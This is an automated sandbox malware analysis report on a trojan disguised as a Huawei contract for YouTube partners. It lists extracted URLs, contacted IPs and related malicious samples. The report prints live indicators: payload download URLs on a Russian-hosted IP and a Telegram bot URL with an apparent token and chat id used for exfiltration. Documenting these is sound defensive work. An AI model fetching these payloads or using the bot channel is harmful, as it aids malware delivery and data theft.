                                                                                                            https://aka.ms/dotnet/download%s%sInstall[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://go.micropowershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://exslt.org/common[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://89.23.97.214/Team/32cv.exe:[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.datacontract.org/2004/07/System.Runtime.Serialization[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://aka.ms/dotnet-illink/com[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://api.ipify.org:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aka.ms/dotnet-illink/nativehostt[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://89.23.97.214/Team/32cv.exe[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/mono/linker/issues/378[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://89.23.97.214/Team/BILLI.exe:[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AB000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://crl.mpowershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://api.ipify.orgnotification_sent.flag[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://aka.ms/dotnet-core-applaunch?GetWindowsDirectory[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://aka.ms/dotnet/sdk-not-foundProbing[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://api.ipify.orgx[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://github.com/dotnet/winforms[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB31F000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.datacontract.org/2004/07/System.Xml.Linq[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://github.com/dotnet/linker/issues/2715.[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/dotnet/runtime/issues/50820[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://aka.ms/GlobalizationInvariantMode[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.datacontract.org/2004/07/System.IO[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://pastebin.compowershell.exe, 00000004.00000002.2198121281.00000224015DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://pastebin.compowershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://aka.ms/dotnet-illink/nativehost[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://aka.ms/dotnet/download[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.datacontract.org/2004/07/SystemY[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessagechat_id-464240[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        208.95.112.1
                                                                                                                                                                        		ip-api.comUnited States
                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                        149.154.167.220
                                                                                                                                                                        		api.telegram.orgUnited Kingdom
                                                                                                                                                                        		62041TELEGRAMRUfalse
                                                                                                                                                                        104.26.12.205
                                                                                                                                                                        		api.ipify.orgUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                        172.67.19.24
                                                                                                                                                                        		pastebin.comUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                        89.23.97.214
                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                        		48687MAXITEL-ASRUfalse

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                        Analysis ID:1617339
                                                                                                                                                                        Start date and time:2025-02-17 19:34:26 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 7m 26s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.expl.evad.winEXE@14/18@4/5
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 10
                                                                                                                                                                        • Number of non-executed functions: 5
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 20.190.160.14, 40.126.31.1
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5980 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        13:35:23API Interceptor56x Sleep call for process: powershell.exe modified

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        208.95.112.1 Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ip-api.com/json/8.46.123.189
                                                                                                                                                                        Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ip-api.com/json/8.46.123.189
                                                                                                                                                                        Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ip-api.com/json/8.46.123.189
                                                                                                                                                                        JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • ip-api.com/json/8.46.123.189
                                                                                                                                                                        BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • www.ip-api.com/line/?fields=16401
                                                                                                                                                                        1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • www.ip-api.com/line/?fields=16401
                                                                                                                                                                        Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                        149.154.167.220 Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                        Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                          facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            104.26.12.205NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            lO5lV39HDj.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            55ryoipjfdr.exeGet hashmaliciousTrickbotBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/?format=text
                                                                                                                                                                                            xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                                                                                            • api.ipify.org/

                                                                                                                                                                                            Domains

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            pastebin.comfortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            ip-api.com Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            api.ipify.org Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                            Doc 1189623388009.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                            play.wav.htmGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                            CheckList Job no.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            http://nodeissuesfix.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                            api.telegram.org Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220

                                                                                                                                                                                            ASNs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            TELEGRAMRU Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            updater.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            CLOUDFLARENETUShttps://login.issue.autonews.com/custompages/crain/login.aspx?pbid=1bfa4d66-4500-4052-8d12-b04775c24d16Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 172.67.26.11
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                            http://link.shoppermeet.net/deep-link?clickid=01H1RW78ZQF6QB5RM2RB5KGV69&geo=us&ip=66.249.66.3&merchantid=108994&propertyid=417896&publisherkey=0f210dc9-c1ef-4153-bd53-8fb98995be03&subid=01GWHNP35ZW7N25QKXMEA9EHVQ&url=%68%74%74%70%73%3A%2F%2F%6F%43%35%4F%43%66%51%50%46%54%30%75%4B%62%59%48%6D%41%67%54%2E%62%72%69%67%68%74%6E%65%78%73%74%2E%72%75%2F%70%61%78%36%6C%66%31%2F%23%23sap@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.70.161
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                            Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
